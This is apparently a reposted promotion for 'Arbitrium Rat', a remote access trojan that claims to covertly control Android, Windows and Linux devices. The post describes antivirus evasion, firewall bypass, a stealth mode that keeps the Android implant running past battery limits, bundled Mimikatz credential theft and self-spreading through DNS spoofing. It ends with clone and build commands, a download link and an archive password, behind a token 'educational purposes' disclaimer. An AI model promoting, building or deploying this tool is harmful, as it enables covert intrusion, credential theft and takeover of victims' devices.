Arbitrium Rat fully undetectable control Android, Windows and Linux

Arbitrium Rat This tool was made for educational purposes only. I urge anyone who would use this tool to only use it on targets he/she is authorized to access as a remote control tool. I hold no responsibility if one used it for any unlawful activity.

Arbitrium Rat is a cross-platform remote access trojan (RAT), Fully UnDetectable (FUD), It allows you to control Android, Windows and Linux and doesn’t require any firewall exceptions or port forwarding. It gives access to the local networks, you can use the targets as a HTTP proxy and access Router, discover local IPs and scan their ports. Includes modules like Mimikatz, new modules can easily be added. In addition, if Arbitrium is used with a DNS spoofing software is can spread autonomously between devices (#AutoSpread). Arbitrium is a multiple parts project, the parts were built using Java, JS, C, Python, Cordova and VueJS.

Features:

  •  FUD

The client uses simple tools which makes it completely undetectable, the trojan based on netcat mainly pipe TCP paquets to run the server’s commands.

  •  Firewall

Arbitrium Rat doesn’t require adding an exception to the firewall, or a port forwarding rule. The server is an API with endpoints that receives tasks for a specific target and others that the trojan periodically requests to get the new instructions, the instructions can be a JavaScript file (the Android app is made using Cordova) or a Shell file to run in the terminal/CMD. Once the server receives a task for a device, the former schedule the task then it opens a child process where it waits for the trojan’s response by listening to a dedicated ephemeral port. Therefore, the trojan doesn’t need to listen to any port.

  •  Battery optimization / StealthMode

Unlike with Stock Android, customizations like MIUI by Xiaomi, EMUI by Huawei, or Samsung’s Android Pie ignore the permissions/exceptions given to an app by the user. So if you try to run an Android’s trojan in the background, the moment the app starts running frequent or heavy (in some cases even lightweight) tasks (ex: sending HTTP requests periodically) it will be killed no matter what permissions the user grants, ths OS completely ignores the current settings, dontkillmyapp.com is a known website dedicated for this particular issue.

The aforementioned issue was quite annoying while working on this project, after a while I found that building a lightweight binary that keeps running the assigned tasks in the background while the MainActivity standstill just after launching the binary appears to bypass most of the restrictions and actually even improve the performance of the App.

MainActivity receives a JS file from the server and uses ThreadPoolExecutor to initiate the binary without hanging for it to exit (More on this StealthMode/BatteryBypass).

  •  Web interface

There is also a control panel, it’s not a requirement but an extension, it’s a simple VueJS webapp, a UI you can use to control the targets instead of directly sending requests to the API. The webapp is available here: Arbitrium WebApp

Requirements

  1. Android’s client
Java ver ...
Cordova
Android SDK & NDK
  1. Windows/Linux client
Python3.6 (or newer)
PyInquirer
Winrar (Windows only)

Build

⚠️ use setAPI_FQDN.sh first to set the server domain/IP in all files

Clone repo:

git clone https://github.com/BenChaliah/Arbitrium-RAT.git --recursive

  1. Android
$ cd ArbitriumClients/AndroidApp/ClientApp/
$ cordova build android
$ cd ../StealthMode/
$ make clean && make build

Download Arbitrium Rat Fully undetectable

Zip Password : www.masterscyber.com